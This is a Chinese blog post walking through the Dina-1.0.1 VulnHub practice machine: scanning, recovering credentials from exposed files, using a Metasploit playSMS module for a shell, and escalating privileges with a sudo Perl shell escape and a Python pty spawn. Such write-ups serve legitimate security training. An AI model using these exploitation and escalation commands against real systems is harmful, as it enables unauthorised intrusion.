Dina-1-0-1靶机复现

于 2024-08-02 20:34:48 发布
阅读量292 收藏 9
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/140879798
版权

靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为:192.168.112.148

目录扫描

80端口开放,进行目录扫描

访问浏览器页面

点击页面网址,没有发现什么有信息的地方

目录拼接

拼接/robots.txt

发现一些可拼接的目录

只有nothing显示404,访问页面源码

发现了password字段

拼接/secure/

发现存在文件backup.zip

解压发现需要密码,使用刚才nothing源码中的password字段尝试

尝试成功,密码为freedom

将该MP3文件使用记事本打开

发现存在账户名touhid

url:/SecreTSMSgatwayLogin

拼接/SecreTSMSgatwayLogin

发现了后台登陆系统

账户名应该就是刚才的touhid

密码继续用nothing中的password字段尝试

发现diana为该账号的密码

(浏览器用firefox有BUG)

getshell

发现为后台为playsms,尝试使用msf进行getshell

search playsms 搜索playsms相关漏洞

use 2

设置参数

set rhosts 192.168.7.140 Dina的IP

set targeturi /SecreTSMSgatwayLogin

set lhost 192.168.7.47 kali的IP

set username touhid

set password diana

run

get shell成功

提权

查看当前用户

sudo -l查看免密操作

尝试sudo提权

sudo perl -e 'exec "/bin/sh";'

使用交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

提权成功

CcHKer
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 825
靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
靶机测试--Dina
ximo的博客
03-28 300
目录信息收集主机发现端口扫描目录扫描漏洞发掘提权总结 信息收集 主机发现 端口扫描 只有80端口: 目录扫描 访问每一个可以访问的路径: 主页: nothing/pass: secure/: 漏洞发掘 得到了一个类似密码字典,一个zip文件。 下载zip文件: 需要密码,使用获得的密码freedom,解压后为mp3格式,但是无法播放: 使用文本打开: 获得了用户名和一个后台,打开: 使用diana可以成功登录: 网站框架为playsms。 搜索CMS漏洞: 有三个属于msf,使用msf
Dina-1-0-1靶机
weixin_71232352的博客
08-01 260
Dina-1-0-1靶机
靶机【B2R】Dina-1-0-1
干铮的博客
09-27 441
【B2R】Dina-1-0-1 1.信息收集 根据靶机MAC地址获取IP。 Nmap -sP 192.168.43.0/24 Nmap 192.168.43.91 -A -p- -oN nmap.A 2.网页信息收集 访问站点 御剑扫描敏感目录 敏感目录 http://192.168.43.91/nothing/ 后台备份文件 解压文件尝试使用之前留给的密码 freedom 使用文本打开文件 访问http://192.168.43.
Dina-1-0-1靶机渗透测试
weixin_58786230的博客
08-01 207
发现只开放了80端口。
Dina-1-0-1
weixin_52953960的博客
08-01 177
【代码】Dina-1-0-1。
Vulhub靶场之Dina-1.0.1
weixin_45650977的博客
04-30 848
Vulhub靶场之Dina-1.0.1 靶机描述 环境准备 vmware15 打开 攻击机:kali NAT模式 靶机Dina1.0.1 NAT模式
Dina-1-0-1靶机(乔布斯看了都说好)
zdd1453691081的博客
08-01 223
发现只开放了80端口。
靶机渗透测试(Dina: 1.0.1)
@小张小张的博客
12-07 1597
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(====) 描述:It wated for kTheBox flag进度:2/2 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 靶机ip为: 192.168.10.133 2. nmap进行靶机端口服务扫描 命令:
dina-mediaserver
06-25
================ DINA-WEB - 媒体服务器模块 Mediaserver 是使用以下产品开发的(版本中有明确的产品)。 Maven 用作“项目管理工具”,Maven 获取 Mediaserver 依赖的所有依赖项 - 每个依赖项都在 pom.xml 文件中...
dina-mediaserver-demo
07-07
================ DINA-WEB : MediaServer-Demo MediaServer-Demo 是使用以下产品开发的(版本中有明确的产品)。 Maven 用作“项目管理工具”,Maven 获取 Mediaserver 依赖的所有依赖项 - 每个依赖项都在 pom.xml...
6008080 g Z 1 dina0 Z-ZEICHNUNG.tif
02-05
6008080 g Z 1 dina0 Z-ZEICHNUNG.tif
Dina Translator-开源
07-03
Dina 是 Windows 的翻译器,可以在大多数应用程序中快速翻译文本,例如 Web 浏览器、游戏、Office 应用程序、Messenger 等。该软件随时使用“在线连接”。 因此,它是翻译的先决条件。 合法访问:软件免费版本未获得...
dina-2021:我为2021年Dina生日创作的拼图
04-08
【标题】"Dina-2021:我为2021年Dina生日创作的拼图"是一个特别的项目,旨在庆祝Dina的生日,通过编程技术为她创造了一个独特的体验。这个项目的核心是一个互动式的拼图游戏,可能使用了JavaScript作为主要的编程语言...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数理方法习题 前六章.pdf
08-03
数理方法习题 前六章
某大型制造企业IT蓝图规划及实施路线.pptx
最新发布
08-03
某大型制造企业IT蓝图规划及实施路线.pptx
基于Springboot和Vue的社区团购系统设计源码 社区团购系统设计代码(98分期末优秀大作业)
08-03
社区团购系统设计源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值